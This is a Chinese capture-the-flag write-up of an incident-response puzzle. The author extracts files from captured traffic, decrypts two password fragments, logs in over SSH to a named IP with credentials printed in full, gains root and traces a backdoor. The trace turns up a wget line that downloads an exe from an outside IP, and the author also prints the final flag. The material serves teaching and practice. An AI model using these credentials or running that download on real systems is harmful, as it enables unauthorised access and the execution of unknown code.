本文作者:Cherishao(信安之路作者团队成员 & 信安之路应急响应小组组长) 招新文章:原创 信安之路应急响应小组招募志同道合的朋友
题目地址:
http://zuohaoyingjixiangyinghennan.xazlsec.com
首页截图如下:
既然前文提到了溯源攻击者,又给了流量包pcapng
包,自然是从流量下手;Wireshark 走起。
协议分级,先看看是否请求下载了什么东西,filter:http
,发现请求了以下几个文件。
看到了有个 Flag 相关的压缩包,先将其导出来,看看里面有啥:
一个公钥、一个私钥,这就不难猜出是利用 RSA 加密了,上面的神秘代码,应该就是密文,
在线 RSA 加密/解密工具
http://tools.jb51.net/password/rsa_encode
解密如下:
得到了一个eK8}vD3=
的文本,上面给了攻击者的 IP,探测发现开启 SSH 服务,尝试登录 root 失败,思考下发现还有个 passwd.jpg 的文件。下载下来看看先;edge 浏览器打开图片发现如下内容:
原来是 Base64 的图片加密,图片转换 Base64:
http://imgbase64.duoshitong.com/
还原看看:得到了一个字符串*mGX3Y-d
知道 IP,又得到了passwd
:*mGX3Y-d
,nmap 扫描了只开启 22 端口,爆破的话,又限制了 IP 的次数,继续看看通信流:
发现存在一个username=C3A37087469
, 知道了 IP 又知道了用户尝试 SSH 登录,一不小心就成功了,真是厉害:).
ssh C3A37087469@207.148.27.120 *mGX3Y-d
既然进来了,那就找后门呗!先看下当前目录下,有什么吧!
[C3A37087469@vultr ~]$ ls
key.sh
这 KEY 也太容易找到了吧!别激动,少年!看看内容先。
[C3A37087469@vultr ~]$ catkey.sh
#@Cherishao
echo“Good job!!"
:) Congratulations, you have come here.
However, you need a higher level of permissions!!!
It is said that higher privilege passwords are more complicated(16bit).
提示需要更高的权限,那自然就是root
了,难不成要提权?自然不是,提示 16bit, 一般默认的初始 vps 密码都会是 16bit,前面不是得到了 2 个字符串嘛,拼接起来:eK8}vD3=*mGX3Y-d
,刚好 16bit :) 这脑洞有点大呀!
[C3A37087469@vultr ~]$ suroot
Password:
[root@vultr C3A37087469]#
(1)查日志,看历史命令,定位到文件位置
先大致检索个吧!ps -ef |grep backdoor*
还真有,少年你太天真了,这么傻的直接命名为这个嘛
[root@vultr ~]# ps -ef |grep backdoor.exe
root 5989 5960 008:58 pts/0 00:00:00 grep--color=auto backdoor.exe
[root@vultr ~]#
(2)还是老老实实的看看 history 先吧!wget
了其它的exe
去看看吧
wget http://173.82.235.146/xazlER.exe
(3) 对 xazlER.exe 进行分析,点击既然要输入密码
(4)密码在哪儿呢?你问我,我也想知道呀!莫不是要逆向这个 PE 文件,别慌,不会那么难,看看属性吧!这原始文件名,怎么有一种似曾相识的感觉,对的,少年,就是它(之前的登录密码:) )
(5)用它来解密,看看
这里得到了最后的
key:
KEY{xazlER006HappyMid-AutumnFestival}
本小题,主要考查了应急响应中的流量分析(文件提取、加解密当然这里设置的场景较为简单),以及 Linux 下后门排查的相关小知识,题目的类型:类似 CTF 里面的misc
,难度不是特别大,但是还是比较烧脑,有些东西不要只是想,想到了还是要去试,祝大家玩得开心的同时,也能学到东西。